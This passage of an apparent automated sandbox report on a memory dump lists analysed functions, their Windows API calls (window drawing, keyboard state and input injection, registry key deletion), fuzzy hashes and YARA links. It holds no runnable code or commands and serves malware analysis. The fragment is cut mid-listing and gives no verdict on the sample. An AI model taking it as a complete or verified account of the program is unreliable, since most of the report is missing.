                • VariantCopy.OLEAUT32(?,?), ref: 00441B6E
                • VariantCopy.OLEAUT32(-00000068,?), ref: 00441B84
                • VariantCopy.OLEAUT32(-00000088,?), ref: 00441B9D
                • VariantClear.OLEAUT32(-00000058), ref: 00441C17
                • SysAllocString.OLEAUT32(00000000), ref: 00441C30
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Variant$Copy$AllocClearErrorLastString
                • String ID:
                • API String ID: 960795272-0
                • Opcode ID: 59d897f97710eddb1c5f1622cd66813baf14dad340eb2618fc6f225bdb7561f0
                • Instruction ID: 5ee54f887d54556b465fcb44dcb023f0e52512b1510f5290eee47b7a909fd39c
                • Opcode Fuzzy Hash: 59d897f97710eddb1c5f1622cd66813baf14dad340eb2618fc6f225bdb7561f0
                • Instruction Fuzzy Hash: B351DE71A142099FCB14DF64DC80BAAB7B9FF58300F10817AE904AB361D778EE45CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00437ACC, Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                Download Yara Rule
                APIs
                • BeginPaint.USER32(00000000,?), ref: 00437B03
                • GetWindowRect.USER32 ref: 00437B81
                • ScreenToClient.USER32 ref: 00437B9F
                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00437BB2
                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00437BF9
                • EndPaint.USER32(?,?), ref: 00437C37
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                • String ID:
                • API String ID: 4189319755-0
                • Opcode ID: f82b1c42a44c8432c727573277c6186a5553dab010d6ca0a17048fb267d47c70
                • Instruction ID: 82b292ebf58521ce1ae1bb2741a2464702f2ef547800f7730369970971e2e476
                • Opcode Fuzzy Hash: f82b1c42a44c8432c727573277c6186a5553dab010d6ca0a17048fb267d47c70
                • Instruction Fuzzy Hash: 6B4161B02042019FD720DF24D884F6B7BE8EB89724F04466EF9A48B291C774AC45CB69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00430994, Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                Download Yara Rule
                APIs
                • ShowWindow.USER32(?,00000000), ref: 00430A11
                • EnableWindow.USER32(?,00000000), ref: 00430A36
                • ShowWindow.USER32(?,00000000), ref: 00430A9F
                • ShowWindow.USER32(?,00000004), ref: 00430AB2
                • EnableWindow.USER32(?,00000001), ref: 00430AD7
                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00430AFC
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$Show$Enable$MessageSend
                • String ID:
                • API String ID: 642888154-0
                • Opcode ID: 5bee9eff2791430ca4f92df8c64608ce068d710ab59025c6792d00fc456d9cd6
                • Instruction ID: 8df19d586924f62332bc8afd79d6d932df6aafd968cdd7b4322fb7be9a9f0353
                • Opcode Fuzzy Hash: 5bee9eff2791430ca4f92df8c64608ce068d710ab59025c6792d00fc456d9cd6
                • Instruction Fuzzy Hash: E3413230600344DFDB25DF14D9A8FA67BE1FB59304F1992EAE9598F3A1C778A841CB18
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043379E, Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 003FF260: _wcslen.LIBCMT ref: 003FF262
                  • Part of subcall function 003FF260: _wcscpy.LIBCMT ref: 003FF282
                • _wcslen.LIBCMT ref: 004337D1
                • _wcslen.LIBCMT ref: 004337EA
                • _wcstok.LIBCMT ref: 004337FC
                • _wcslen.LIBCMT ref: 00433810
                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0043381E
                • _wcstok.LIBCMT ref: 00433835
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                • String ID:
                • API String ID: 3632110297-0
                • Opcode ID: c68a8c7427881a9c9a1efb2bbb7c7ab5420ec646188dc1fa8315d2e8af0f4fca
                • Instruction ID: 0b8f272bd5ff26eb61e9029411844afe3f577d6ecb622d2caf211ed7e26796bf
                • Opcode Fuzzy Hash: c68a8c7427881a9c9a1efb2bbb7c7ab5420ec646188dc1fa8315d2e8af0f4fca
                • Instruction Fuzzy Hash: 6221C2B29002086BCB10EF95DC819AFB7F8FF84311F54442EF859A3241D778EA5087A5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00423187, Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                Download Yara Rule
                APIs
                • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,00498178), ref: 0042319E
                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,00498178), ref: 004231B9
                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,00498178), ref: 004231C3
                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00498178), ref: 004231CB
                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,00498178), ref: 004231D5
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: PerformanceQuery$CounterSleep$Frequency
                • String ID:
                • API String ID: 2833360925-0
                • Opcode ID: e58457e9492ac884b333ef177e3ad9b9dd9dfeacbe5054fd81fc85dd7307b91b
                • Instruction ID: 3eea616d8160e5d3403d164e8df189100b6240ee13468c56e228b71e7dec7e4b
                • Opcode Fuzzy Hash: e58457e9492ac884b333ef177e3ad9b9dd9dfeacbe5054fd81fc85dd7307b91b
                • Instruction Fuzzy Hash: 1611B432E0012DDBCF009FD9EA049EDB774FF49712F4145A6D908B3204DB749A51CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00437199, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004370BF: DeleteObject.GDI32(00000000), ref: 004370FC
                  • Part of subcall function 004370BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0043713C
                  • Part of subcall function 004370BF: SelectObject.GDI32(?,00000000), ref: 0043714C
                  • Part of subcall function 004370BF: BeginPath.GDI32(?), ref: 00437161
                  • Part of subcall function 004370BF: SelectObject.GDI32(?,00000000), ref: 0043718A
                • MoveToEx.GDI32(?,?,?,00000000), ref: 004371C4
                • LineTo.GDI32(?,?,?), ref: 004371D0
                • MoveToEx.GDI32(?,?,?,00000000), ref: 004371DE
                • LineTo.GDI32(?,?,?), ref: 004371EA
                • EndPath.GDI32(?), ref: 004371FA
                • StrokePath.GDI32(?), ref: 00437208
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                • String ID:
                • API String ID: 372113273-0
                • Opcode ID: fd1852cb25d5ba7338afb2eaa7deadcbbf9fa49a918ba75d1762b8c2a238330a
                • Instruction ID: 35a4bf74de757b75a4806015e753d65524dda7bc5f249f775fd160a14c1f29cd
                • Opcode Fuzzy Hash: fd1852cb25d5ba7338afb2eaa7deadcbbf9fa49a918ba75d1762b8c2a238330a
                • Instruction Fuzzy Hash: B101FC72001214BBE3219B44EC8CFDB7B2CEF4A300F000129FA05A628187B42A80CBBD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043CBC7, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                Download Yara Rule
                APIs
                • GetDC.USER32(00000000), ref: 0043CBE3
                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0043CBEE
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0043CBFA
                • ReleaseDC.USER32 ref: 0043CC06
                • MulDiv.KERNEL32(000009EC,?,?), ref: 0043CC1E
                • MulDiv.KERNEL32(000009EC,?,?), ref: 0043CC2F
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CapsDevice$Release
                • String ID:
                • API String ID: 1035833867-0
                • Opcode ID: cdb2b83760f2388f49e626a376dc30ce95897b33f6274b66ea3a4ad2d59933ea
                • Instruction ID: a5a86c71256f9fba23cde4a01fb56b50f352bf675524776cf44d0f195d3d8e33
                • Opcode Fuzzy Hash: cdb2b83760f2388f49e626a376dc30ce95897b33f6274b66ea3a4ad2d59933ea
                • Instruction Fuzzy Hash: E60112B5640214BFE7109F95DD85F5A7B6CFF58761F00801AFF0CDB240D6B499408BA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FF010, Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                Download Yara Rule
                APIs
                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 003FF048
                • MapVirtualKeyW.USER32(00000010,00000000), ref: 003FF050
                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003FF05B
                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003FF066
                • MapVirtualKeyW.USER32(00000011,00000000), ref: 003FF06E
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 003FF076
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Virtual
                • String ID:
                • API String ID: 4278518827-0
                • Opcode ID: 15dc91798de6962dac49bf7154a189f69828fe3dc311675b26c67457101feed6
                • Instruction ID: c03ee99189ceef3c37337f22543ded0de5c3a50d7349ee6ee6d84e0c85219d2d
                • Opcode Fuzzy Hash: 15dc91798de6962dac49bf7154a189f69828fe3dc311675b26c67457101feed6
                • Instruction Fuzzy Hash: 84016770106B88ADD3309F668C84B43FEF8EF95704F01491DD1D907A52C6B5A84CCB69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043B5C7, Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                Download Yara Rule
                APIs
                • InterlockedExchange.KERNEL32(?,?), ref: 0043B5E1
                • EnterCriticalSection.KERNEL32(?), ref: 0043B5F2
                • TerminateThread.KERNEL32(?,000001F6), ref: 0043B600
                • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0043B60E
                  • Part of subcall function 004225E5: CloseHandle.KERNEL32(00000000,00000000,?,0043B61A,00000000,?,000003E8,?,000001F6), ref: 004225F3
                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0043B623
                • LeaveCriticalSection.KERNEL32(?), ref: 0043B62A
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                • String ID:
                • API String ID: 3495660284-0
                • Opcode ID: 0ec22fa43ee8cc4efd2a4a4c54b4ae891d853eb67a701963627949b66988e0e1
                • Instruction ID: 571f33fb77593ce97826c07fc1f6e7e631b195fc7faed99a747609ab8e86f91b
                • Opcode Fuzzy Hash: 0ec22fa43ee8cc4efd2a4a4c54b4ae891d853eb67a701963627949b66988e0e1
                • Instruction Fuzzy Hash: 86F0AF72241201BBC200AF60EE89DABB77CFF48311F400526F60982562CBB4E491CBA6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044F9B8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120windowCOMMON
                Download Yara Rule
                APIs
                • _memset.LIBCMT ref: 0044FA20
                • GetMenuItemInfoW.USER32 ref: 0044FA3B
                • DeleteMenu.USER32(?,?,00000000), ref: 0044FA8C
                • DeleteMenu.USER32(00000000,?,00000000), ref: 0044FADF
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Menu$Delete$InfoItem_memset
                • String ID: 0
                • API String ID: 1173514356-4108050209
                • Opcode ID: 1b8c7b1fda26eea1c7e3a368694ddc5ca3273dd487a5d864e67b846d47f275aa
                • Instruction ID: 8bad6f450b1605514415abdfd5bae63879cf28041bb12f65d6eab7b1465796f7
                • Opcode Fuzzy Hash: 1b8c7b1fda26eea1c7e3a368694ddc5ca3273dd487a5d864e67b846d47f275aa
                • Instruction Fuzzy Hash: 6E419371604341ABE310DF25D844B5BB7A8FF85324F14862EF9A8AB2C1D374E8458BA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00433346, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Handle
                • String ID: nul
                • API String ID: 2519475695-2873401336
                • Opcode ID: e74780f305c83a65659aef61974e90d813f14df7e0a264ddbdb0d222f3e9d819
                • Instruction ID: 5dcbfcb2504c5127bdea7449568c049957596e300f91128adf00ba83c669e05e
                • Opcode Fuzzy Hash: e74780f305c83a65659aef61974e90d813f14df7e0a264ddbdb0d222f3e9d819
                • Instruction Fuzzy Hash: AD31C531600208ABD720DF68EC45BAB77A8EF08321F10864AFD54D73D1EBB5D950CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00433253, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                Download Yara Rule
                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 00433281
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Handle
                • String ID: nul
                • API String ID: 2519475695-2873401336
                • Opcode ID: 6f50c5f68fc4b7c46f82abd4b9bea8ba078af7e367ff1d0f4427a58f0b3eb885
                • Instruction ID: e5d0ff15207cb455b505c0e7dbe24ae0665dbe5d70043bddb552653b0740abc1
                • Opcode Fuzzy Hash: 6f50c5f68fc4b7c46f82abd4b9bea8ba078af7e367ff1d0f4427a58f0b3eb885
                • Instruction Fuzzy Hash: E3217331600204ABD7209F68DC45FABB7A8EF19331F10879AFDA4973D0DBB59A90C795
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00430BD0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID: SysAnimate32
                • API String ID: 0-1011021900
                • Opcode ID: ee0dbf1a3d9d9cc43cbbb36bc52d7ceaf1ef8d9a1738516ed75a90dfb8bbdc5b
                • Instruction ID: b0f1e44ba4683f2cec0800db3ef748e8370ff1d2ce0d6199a24bf4a605e4b653
                • Opcode Fuzzy Hash: ee0dbf1a3d9d9cc43cbbb36bc52d7ceaf1ef8d9a1738516ed75a90dfb8bbdc5b
                • Instruction Fuzzy Hash: AB21A771200204ABEB249E69DC95FAB73DCEB99724F20671BF514D72C0C678EC818B68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043C2F0, Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                Download Yara Rule
                APIs
                • GetKeyboardState.USER32(?), ref: 0043C348
                • SetKeyboardState.USER32(00000080), ref: 0043C36C
                • PostMessageW.USER32(00000000,00000101,?,?), ref: 0043C3B0
                • PostMessageW.USER32(00000000,00000105,?,?), ref: 0043C3E8
                • SendInput.USER32(00000001,?,0000001C), ref: 0043C475
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: KeyboardMessagePostState$InputSend
                • String ID:
                • API String ID: 3031425849-0
                • Opcode ID: d0f0a8fe47854248642a8e47684977a0ddf2ab4eb756056504c13448a7abbc4d
                • Instruction ID: 257e538e0befd20575bd579f0673be2d026053f971001a29ad50e7cc34d7dcf7
                • Opcode Fuzzy Hash: d0f0a8fe47854248642a8e47684977a0ddf2ab4eb756056504c13448a7abbc4d
                • Instruction Fuzzy Hash: 82418D315002586ADB10DFA9ECC5BFF7B68EF8A310F40D05BFD9866242C37D99558BA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00446308, Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                Download Yara Rule
                APIs
                • GetCursorPos.USER32(?), ref: 0044631D
                • ScreenToClient.USER32 ref: 0044633A
                • GetAsyncKeyState.USER32(?), ref: 00446377
                • GetAsyncKeyState.USER32(?), ref: 00446387
                • GetWindowLongW.USER32(?,000000F0), ref: 004463DD
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AsyncState$ClientCursorLongScreenWindow
                • String ID:
                • API String ID: 3539004672-0
                • Opcode ID: 4366f1e751dd7a04a59f8c20e96d91df5d854e262261bb726e66054d9043c9d6
                • Instruction ID: 270bd74a82b582f24254f63f6edf28bf5273a459a0a89570a7ba79b05a7ff329
                • Opcode Fuzzy Hash: 4366f1e751dd7a04a59f8c20e96d91df5d854e262261bb726e66054d9043c9d6
                • Instruction Fuzzy Hash: 23413074504214BBEB24CF65C884DEBB7B9EF46324F10465EF86593290C634A980DB69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00431C02, Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                Download Yara Rule
                APIs
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00431C30
                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00431C64
                • RegCloseKey.ADVAPI32(?), ref: 00431C85
                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00431CC7
                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00431CF5
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Enum$CloseDeleteOpen
                • String ID:
                • API String ID: 2095303065-0
                • Opcode ID: da9c104c1b06a5f7c5841e68c90d75afbdf3008f35f5785dd2736d0e5a1bfc87
                • Instruction ID: 1193b0a33ecda91fd5ff616139bc729272621a760a8f8d176cd52fa17ab37bf0
                • Opcode Fuzzy Hash: da9c104c1b06a5f7c5841e68c90d75afbdf3008f35f5785dd2736d0e5a1bfc87
                • Instruction Fuzzy Hash: 39319CB2900118BEDB10DBD4EC85EFEB3BCEB49304F14456AF605A7141E678AE848BB4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00426995, Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: RectWindow
                • String ID:
                • API String ID: 861336768-0
                • Opcode ID: 81973a8663a9d13ab2c73cc3a776946c5b5e06a30275a821bb826eae084b0397
                • Instruction ID: 103c1f9ac63b4998edad80ec7faf42453def21e776f4dc6950162e450a6f0efb
                • Opcode Fuzzy Hash: 81973a8663a9d13ab2c73cc3a776946c5b5e06a30275a821bb826eae084b0397
